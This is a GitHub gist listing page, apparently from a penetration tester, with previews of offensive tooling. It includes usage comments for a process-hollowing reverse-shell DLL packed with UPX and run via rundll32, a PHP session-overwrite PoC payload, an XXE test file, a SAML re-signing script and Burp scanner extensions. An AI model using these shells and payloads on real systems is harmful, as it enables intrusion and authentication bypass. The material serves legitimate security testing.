Frank Spierings FrankSpierings

View GitHub Profile
@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active Nov 26, 2020
Reverse shell which uses process hollowing technique
View process-hollow-shell-dll.c
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non-Microsoft DLLs into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@FrankSpierings
FrankSpierings / request-minify.py
Last active Nov 6, 2020
Burp extension to minify a request's headers and parameters into another Repeater tab.
View request-minify.py
from burp import IParameter
from burp import IBurpExtender
from burp import IContextMenuFactory
from burp import IContextMenuInvocation
from javax.swing import JMenuItem
import java.util.ArrayList as ArrayList
from threading import Thread
from Queue import Queue
from traceback import format_exc
import time
@FrankSpierings
FrankSpierings / burp-ntfs-ads-scan.py
Last active Nov 10, 2020
Burp NTFS Alternative Data Stream Scanner
View burp-ntfs-ads-scan.py
# coding=utf-8
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IScannerInsertionPoint
from array import array
class BurpExtender(IBurpExtender, IScannerCheck):
@FrankSpierings
FrankSpierings / cookie-authenticated-onedrive-enum.py
Created Oct 6, 2020
Checks OneDrive access based on someone's UPN.
View cookie-authenticated-onedrive-enum.py
@FrankSpierings
FrankSpierings / README.MD
Last active Aug 12, 2020
Windows Reverse Port Forwarding using C# / Powershell
View README.MD

Socat

  • On the lhost listening side you can use socat to create two server sockets:
socat -dd TCP-LISTEN:4444,reuseaddr,fork TCP-LISTEN:1234,reuseaddr
  • Once WPF has connected to port 4444, you can talk to 127.0.0.1:1234 as if it were the remote host.
@FrankSpierings
FrankSpierings / sample-php-socket-connect.php
Created Aug 11, 2020
PHP Socket Connect Example Reference
View sample-php-socket-connect.php
<?php
$host = "ifconfig.co";
$port = 80;
$msg = "GET / HTTP/1.1\r\nHost: $host\r\n\r\n";
// Create a TCP socket and connect it to the remote host; abort on failure.
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock === false || !socket_connect($sock, $host, $port)) {
    die("socket error: " . socket_strerror(socket_last_error()) . "\n");
}
// Send the raw HTTP request and read the first 4096 bytes of the response.
socket_send($sock, $msg, strlen($msg), 0);
$result = socket_read($sock, 4096);
echo $result;
socket_close($sock);
@FrankSpierings
FrankSpierings / README.MD
Created Aug 6, 2020
Session overwrite in PHP through extract - PoC
View README.MD

Exploit

  • POST-ing a body containing _SESSION[secret]=1 will log you in, but only through the second extract.
View xxe-test.xml
<?xml version="1.0"?>
<!DOCTYPE dt [
<!ENTITY sample "KqsdwTrqAisGYNNu5XMhkUV4gTxm8ed8">
]>
<root>&sample;</root>
@FrankSpierings
FrankSpierings / saml-raider-manual-resing.py
Created Jun 29, 2020
If SAML Raider won't re-sign the requests, re-sign them manually with signxml.
View saml-raider-manual-resing.py
from lxml import etree
from signxml import XMLSigner, XMLVerifier
self_key_path = 'self.key'
cloned_cert_path = 'self.pem'
# SAML message with its signatures removed using SAML Raider
unsigned_saml_path = 'unsigned_1.xml'
self_key = open(self_key_path).read()
@FrankSpierings
FrankSpierings / ELK-Evtx-and-MSDNS.md
Last active Jul 1, 2020
Describes some configuration and scripts to parse Evtx files and MS-DNS Debug query logs to the ELK stack.
View ELK-Evtx-and-MSDNS.md

Setup Docker Elk Stack

  • Pull the recipe:
cd /tmp
git clone https://github.com/deviantony/docker-elk
  • Add the following to elasticsearch/config/elasticsearch.yml: